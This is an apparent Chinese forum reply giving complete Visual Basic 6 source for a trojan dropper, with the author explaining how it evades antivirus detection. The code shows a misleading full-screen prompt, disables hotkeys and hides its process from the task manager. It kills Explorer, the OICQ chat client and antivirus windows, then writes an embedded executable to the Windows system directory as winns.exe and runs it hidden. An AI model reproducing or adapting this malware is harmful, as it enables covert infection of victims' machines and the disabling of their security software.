这是很久以前回答人家一道关于使用 VB 捆绑木马的问题,有些 API 只可用于 Win9x,回复如下:
其实不需要记录文件的大小,我为了方便,直接用捆绑工具把我的程序与木马合并在一起,结果被杀毒软件给查出来了,后来我就想到把木马放到资源文件中,待程序运行时先把杀毒软件的进程给KILL掉,然后再把它释放出来,效果很好,并且杀毒软件也查不到,以下是我的程序源代码。里面还有很多与它不相关的代码,我是用来杀进程的,GetDesktopWindows 可以用 EnumWindows 完全代替,代码也可以减少很多。
Option Explicit
Dim wndNum As Long '保存所有窗体数量
Dim lpWnd(128) As String '存放所有窗体标题数组
'设置进程优先级
Private Declare Function SetPriorityClass Lib _
"kernel32" ( _
ByVal hProcess As Long, _
ByVal dwPriorityClass As Long _
) As Long
'获取当前进程
Private Declare Function GetCurrentProcess Lib _
"kernel32" () As Long
'最低优先级,表明在计算机空闲时运行
Private Const IDLE_PRIORITY_CLASS = &H40
'将进程注册为服务,Windows 2000 系统不可用
Private Declare Function RegisterServiceProcess Lib _
"kernel32" ( _
ByVal hProcess As Long, _
ByVal uFlags As Long _
) As Long
'获取当前进程 ID
Private Declare Function GetCurrentProcessId Lib _
"kernel32" () As Long
'在此程序中用来屏蔽热键
Private Declare Function SystemParametersInfo Lib _
"User32" Alias "SystemParametersInfoA" ( _
ByVal uAction As Long, _
ByVal uParam As Long, _
ByRef lpvParam As Any, _
ByVal fuWinIni As Long _
) As Long
'屏蔽热键,对于 Windows 2000 系统无效
Private Const SPI_SCREENSAVERRUNNING = 97
'将窗体设为顶层
Private Declare Function SetWindowPos Lib _
"User32" ( _
ByVal hwnd As Long, _
ByVal hWndInsertAfter As Long, _
ByVal x As Long, _
ByVal y As Long, _
ByVal cx As Long, _
ByVal cy As Long, _
ByVal wFlags As Long _
) As Long
'将窗体设为最前
Private Const HWND_TOPMOST = -1
'获取桌面句柄
Private Declare Function GetDesktopWindow Lib _
"User32" () As Long
'获取窗体句柄
Private Declare Function GetWindow Lib _
"User32" ( _
ByVal hwnd As Long, _
ByVal wCmd As Long _
) As Long
'获取子窗体句柄
Private Const GW_CHILD = 5
'获取下一个窗体句柄
Private Const GW_HWNDNEXT = 2
'获取窗体标题
Private Declare Function GetWindowText Lib _
"User32" Alias "GetWindowTextA" ( _
ByVal hwnd As Long, _
ByVal lpString As String, _
ByVal cch As Long _
) As Long
'发送消息,用来关闭指定程序,比如杀毒,网管
Private Declare Function PostMessage Lib _
"User32" Alias "PostMessageA" ( _
ByVal hwnd As Long, _
ByVal wMsg As Long, _
ByVal wParam As Long, _
ByVal lParam As Long _
) As Long
'关闭程序
Private Const WM_CLOSE = &H10
'退出程序
Private Const WM_QUIT = &H12
'查找窗体
Private Declare Function FindWindow Lib _
"User32" Alias "FindWindowA" ( _
ByVal lpClassName As String, _
ByVal lpWindowName As String _
) As Long
'获取类名
Private Declare Function GetClassName Lib _
"User32" Alias "GetClassNameA" ( _
ByVal hwnd As Long, _
ByVal lpClassName As String, _
ByVal nMaxCount As Long _
) As Long
'延时以确保程序已关闭
Private Declare Sub Sleep Lib _
"kernel32" ( _
ByVal dwMilliseconds As Long _
)
'获得 Windows 系统目录
Private Declare Function GetSystemDirectory Lib _
"kernel32" Alias "GetSystemDirectoryA" ( _
ByVal lpBuffer As String, _
ByVal nSize As Long _
) As Long
'销毁窗体,释放内存
Private Declare Function DestroyWindow Lib _
"User32" ( _
ByVal hwnd As Long _
) As Long
'销毁句柄,释放内存
Private Declare Function CloseHandle Lib _
"kernel32" ( _
ByVal hObject As Long _
) As Long
'枚举窗体
Private Declare Function EnumWindows Lib _
"User32" ( _
ByVal lpEnumFunc As Long, _
ByVal lParam As Long _
) As Long
Private Sub Form_Load()
'只运行应用程序的一个实例
If App.PrevInstance = True Then End
'将窗体设为顶层
SetWindowPos Me.hwnd, HWND_TOPMOST, 0, 0, 0, 0, 0
'给使用者一个提示
MsgBox "该程序运行于全屏模式,请关闭所有程序以" & _
"获得最佳效果!", vbInformation Or vbSystemModal
'取消热键
SystemParametersInfo SPI_SCREENSAVERRUNNING, _
True, 0, 0
'将图片居中
img.Move (Screen.Width - img.Width) / 2, _
(Screen.Height - img.Height) / 2
fra(0).Move img.Left - fra(0).Width - 600
fra(1).Move img.Left + img.Width + 600
'获取进程,并将它的优先级别设为空闲
SetPriorityClass GetCurrentProcess, _
IDLE_PRIORITY_CLASS
'获取进程ID,并将它注册为服务类型,因此在按下 _
Ctrl+Alt+Del 后该进程将变为不可见,该方法 _
还可以直接用 app.TaskVisible=False 实现, _
但效果不佳,注意,该 API 不支持 Win2000 系统
RegisterServiceProcess GetCurrentProcessId, 1
'刷新一下进程
RefreshProcess
'杀掉浏览器
Do While KillProcess("Explorer") <> 0
Loop
'杀掉文件夹或 Internet Explorer 浏览器
Do While KillProcess("WClass", True) <> 0
Loop
Do While KillProcess("SystemTr", True) <> 0
Loop
'杀掉 Oicq
Do While KillProcess("icq") <> 0
Loop
'杀掉毒霸之类的杀毒软件
Do While KillProcess("毒") <> 0
Loop
Do While KillProcess("霸") <> 0
Loop
'释放资源文件中的可执行文件
WriteExe
End Sub
'刷新所有进程
Private Sub RefreshProcess()
Dim retWnd As Long '窗体句柄
Dim dskWnd As Long '桌面句柄
Dim lpTitle As String * 128 '窗体标题
'清除数组中保留的窗体名称
For wndNum = LBound(lpWnd) To UBound(lpWnd)
lpWnd(wndNum) = ""
Next wndNum
'初始化窗体数目
wndNum = 0
'获取桌面句柄
dskWnd = GetDesktopWindow()
'获取桌面子窗体
retWnd = GetWindow(dskWnd, GW_CHILD)
'列举所有窗体
Do While retWnd <> 0
'获得窗体标题
GetWindowText retWnd, lpTitle, Len(lpTitle)
'将标题保存到数组
If Left(lpTitle, 1) <> vbNullChar Then
lpWnd(wndNum) = Left(lpTitle, InStr(1, _
lpTitle, vbNullChar) - 1)
wndNum = wndNum + 1
End If
'获取下一个窗体
retWnd = GetWindow(retWnd, GW_HWNDNEXT)
Loop
End Sub
'将含有指定关键字的进程关闭
Private Function KillProcess(KeyWord As String, _
Optional IsClass As Boolean = False) As Long
Dim lpClassName As String * 128
Dim ClassName As String
Dim fndWnd As Long
Dim wndHdc As Long
KillProcess = 0
For fndWnd = 0 To wndNum
'判断查找的是否为类的关键字
If IsClass = True Then
'获得窗体句柄
wndHdc = FindWindow(vbNullString, _
lpWnd(fndWnd))
'获取类名到缓冲区
GetClassName wndHdc, lpClassName, _
Len(lpClassName)
'解析出类名
ClassName = Left(lpClassName, InStr(1, _
lpClassName, vbNullChar) - 1)
'找到后将它关闭,有时只使用 WM_QUIT 不能 _
完成任务,使用 WM_CLOSE 再试一次
If InStr(1, ClassName, KeyWord) > 0 Then
wndHdc = FindWindow(ClassName, _
vbNullString)
KillProcess = KillProcess + 1
QuitDestroy wndHdc
End If
'查找标题带有关键字的窗体
ElseIf InStr(1, lpWnd(fndWnd), KeyWord) > 0 Then
wndHdc = FindWindow(vbNullString, _
lpWnd(fndWnd))
KillProcess = KillProcess + 1
QuitDestroy wndHdc
End If
Next fndWnd
End Function
Private Sub WriteExe()
Dim exeData() As Byte
Dim fileNum As Long
Dim SysDir As String * 128
GetSystemDirectory SysDir, Len(SysDir)
exeData = LoadResData("LOVEME", "Execute")
fileNum = FreeFile()
Open Left(SysDir, InStr(1, SysDir, vbNullChar) _
- 1) & "\winns.exe" For Binary As #fileNum
Put #fileNum, , exeData
Close #fileNum
Shell Left(SysDir, InStr(1, SysDir, vbNullChar) _
- 1) & "\winns.exe", vbHide
End Sub
Private Sub QuitDestroy(wnd As Long)
PostMessage wnd, WM_QUIT, 0, 0
PostMessage wnd, WM_CLOSE, 0, 0
DestroyWindow wnd
CloseHandle wnd
'再次刷新一下进程,这一点非常有必要, _
目的是判断相关线程是否存在,否则程 _
序会将自己杀死
RefreshProcess
End Sub
